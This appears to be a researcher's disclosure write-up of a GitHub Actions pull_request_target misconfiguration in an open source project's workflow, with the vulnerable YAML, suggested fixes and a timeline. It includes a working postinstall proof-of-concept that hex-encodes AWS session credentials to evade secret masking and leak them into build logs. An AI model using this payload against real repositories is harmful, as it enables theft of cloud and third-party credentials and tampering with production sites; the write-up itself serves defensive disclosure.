While doing research for a follow-up to my GCP Workload Identity post (coming soon), I kept noticing pull_request_target misuses alongside the WIF findings. They're a different class of problem. The WIF issues were authentication misconfigurations. You could authenticate as someone else's service account from an unrelated repository. This is a workflow trigger designed for a specific use case that is very easy to get wrong in a way that hands attacker-controlled code to a runner with your secrets already in the environment. I found one where all the pieces were in place.
The Vulnerability
pull_request_target is a GitHub Actions trigger that was introduced to allow workflows on fork pull requests to access repository secrets. Unlike the standard pull_request trigger, it runs in the context of the base repository, which means it has access to secrets, OIDC tokens, and elevated permissions even when the PR comes from a fork.
The problem is that it is very easy to misconfigure. The pattern that makes it dangerous is straightforward. If your workflow checks out attacker-controlled code and then does anything with secrets or credentials it becomes a problem.
What I Found
A well-known open source project had a workflow that combined four things in a way that made it exploitable by anyone with a GitHub account.
An unsafe trigger
on:
pull_request_target:
branches: [main]Many repos add a gate here. A label check, an author association check, something that requires maintainer approval before the workflow runs. This one had none of that. Any fork PR against main fires it immediately.
A custom action
- name: Merge test branch
uses: org/merge-test-branch@v2.7After this step, every file in the workspace reflects the attacker's fork. Including package.json.
AWS OIDC credentials loaded into the environment
- name: Configure AWS credentials
uses: aws-actions/configure-aws-credentials@v6
with:
role-to-assume: arn:aws:iam::REDACTED:role/github-actions-oidc-role
aws-region: us-east-1This puts AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, and AWS_SESSION_TOKEN into the runner environment for all of the following steps.
npm ci runs with attacker code on disk
npm cinpm ci respects lifecycle scripts in package.json. Because step 2 already replaced package.json with the attacker's version, any preinstall, install, or postinstall script runs as the runner user. With live AWS credentials in the environment.
There were also several third-party API keys exported into the same environment at the same time, such as image hosting, a CRM, and a captcha service.
Exploit
The exploit is simple. Fork the repository, add a postinstall script to package.json, open a PR. No maintainer interaction required.
{
"scripts": {
"postinstall": "node -e \"const n=['AWS_ACCESS_KEY_ID','AWS_SECRET_ACCESS_KEY','AWS_SESSION_TOKEN'];const k=Object.fromEntries(n.map(x=>[x,Buffer.from(process.env[x]||'').toString('hex')]));console.log('POC_CREDS:'+JSON.stringify(k))\""
}
}The hex encoding is needed to bypass GitHub Actions' secret masking, which replaces raw credential strings in logs but doesn't match encoded versions. In the past I've used base64 for this but it didn't work this time, maybe they've caught on to that.
When the PR is opened, the workflow fires automatically. npm ci runs the postinstall script. The credentials land in the build log.
I tested this against a sandbox replica of the vulnerable workflow pointing at a personal AWS role with minimal permissions. The credentials came back immediately.
AWS_ACCESS_KEY_ID: ASIA...
AWS_SECRET_ACCESS_KEY: R2tq...
AWS_SESSION_TOKEN: IQoJ... (full STS session token)Confirmed live with aws sts get-caller-identity. In the real attack this would be the organisation's production deployment role, not a sandbox.
Impact
The AWS role was the same one used to deploy the organisation's production website on every push to main. At minimum it had the permissions required to run that deployment, so an attacker could modify the live site during their session window.
As well as AWS, the same attack exposed credentials for the image hosting provider, the CRM, and the captcha service. All were exported into the environment in the same step as npm ci.
The workflow also ran on a self-hosted runner. Those don't get wiped between jobs the way GitHub-hosted runners do. A postinstall hook that managed to escape the runner and write a file outside the workspace could maintain a foothold across subsequent runs but I didn't test this.
Fix
The cleanest fix is to replace pull_request_target with pull_request. GitHub's platform enforces that fork PRs under pull_request cannot access id-token: write, so the AWS credential step simply fails. The trade-off is that preview deploys stop working for fork PRs, which is the correct security posture.
on:
pull_request:
branches: [main]If the fork PR preview deploys are a hard requirement, the workflow needs an explicit maintainer approval gate before any code from the PR touches the workspace, and the label must be automatically removed after each run to prevent reuse.
on:
pull_request_target:
types: [labeled]
jobs:
process-pull-request:
if: github.event.label.name == 'safe-to-deploy'The broader lesson is that pull_request_target should be treated like running untrusted code with your secrets. Because that is exactly what it is.
Full Workflow
For reference, here is the complete vulnerable workflow with identifying details redacted.
name: PullRequestAction
on:
pull_request_target:
branches: [main]
concurrency:
group: ${{ github.workflow }}-${{ github.event.number }}
cancel-in-progress: true
env:
NODE_VERSION: "20.19.0"
permissions:
contents: read
statuses: write
pull-requests: write
id-token: write
jobs:
process-pull-request:
runs-on: self-hosted
steps:
- name: Fetch git repository
uses: actions/checkout@v6.0.2
with:
fetch-depth: "0"
- name: Restore main cache first
uses: actions/cache/restore@v5
id: main-cache
with:
path: cache
key: cache-main
- name: Restore PR cache
uses: actions/cache/restore@v5
id: pr-cache
with:
path: cache
key: cache-${{ github.sha }}-${{ github.run_id }}
restore-keys: |
cache-${{ github.sha }}-
cache-main
- name: Initialise status
run: |
export STATUSES_URL=$(jq -r ".pull_request.statuses_url" $GITHUB_EVENT_PATH)
export DATA='{"state": "pending", "target_url": "", "context": "Deploy preview", "description": "Waiting for site to build"}'
curl -s -S -H "Content-Type: application/json" -H "Authorization: token $TOKEN" -d "$DATA" "$STATUSES_URL"
env:
TOKEN: ${{ secrets.GITHUB_TOKEN }}
- name: Merge test branch
uses: org/merge-test-branch@v2.7
- name: Set up Node.js
uses: actions/setup-node@v6
with:
node-version: ${{ env.NODE_VERSION }}
cache: "npm"
- name: Configure AWS credentials
uses: aws-actions/configure-aws-credentials@v6
with:
role-to-assume: arn:aws:iam::REDACTED:role/github-actions-oidc-role
aws-region: us-east-1
- name: Deploy Preview
env:
TOKEN: ${{ secrets.GITHUB_TOKEN }}
run: |
export NODE_OPTIONS=--experimental-wasm-modules
export IS_PUBLIC=true
export IS_PREVIEW=true
export CLOUDINARY_CLOUD_NAME=${{ secrets.CLOUDINARY_CLOUD_NAME }}
export CLOUDINARY_API_KEY=${{ secrets.CLOUDINARY_API_KEY }}
export CLOUDINARY_API_SECRET=${{ secrets.CLOUDINARY_API_SECRET }}
export CLOUDINARY_URL=${{ secrets.CLOUDINARY_URL }}
export PUBLIC_CLOUDINARY_CLOUD_NAME=${{ secrets.PUBLIC_CLOUDINARY_CLOUD_NAME }}
export PUBLIC_FRIENDLY_CAPTCHA_SITEKEY=${{ vars.FRIENDLY_CAPTCHA_SITEKEY }}
export FRIENDLY_CAPTCHA_API_KEY=${{ secrets.FRIENDLY_CAPTCHA_API_KEY }}
export PIPELINE_CRM_ENDPOINT=${{ vars.PIPELINE_CRM_ENDPOINT }}
export PIPELINE_CRM_W2LID=${{ vars.PIPELINE_CRM_W2LID }}
export PIPELINE_CRM_API_KEY=${{ secrets.PIPELINE_CRM_API_KEY }}
export PIPELINE_CRM_APP_KEY=${{ secrets.PIPELINE_CRM_APP_KEY }}
export DECAP_DOMAIN=${{ vars.DECAP_DOMAIN }}
export CUSTOM_DOMAIN="REDACTED-pr-${{ github.event.number }}.example.com"
npm ci
- uses: actions/cache/save@v5
with:
path: cache
key: cache-${{ github.sha }}-${{ github.run_id }}
Disclosure
10th April: Initial disclosure to their security contact
23rd April: Followed up, no response received
24th April: Fix deployed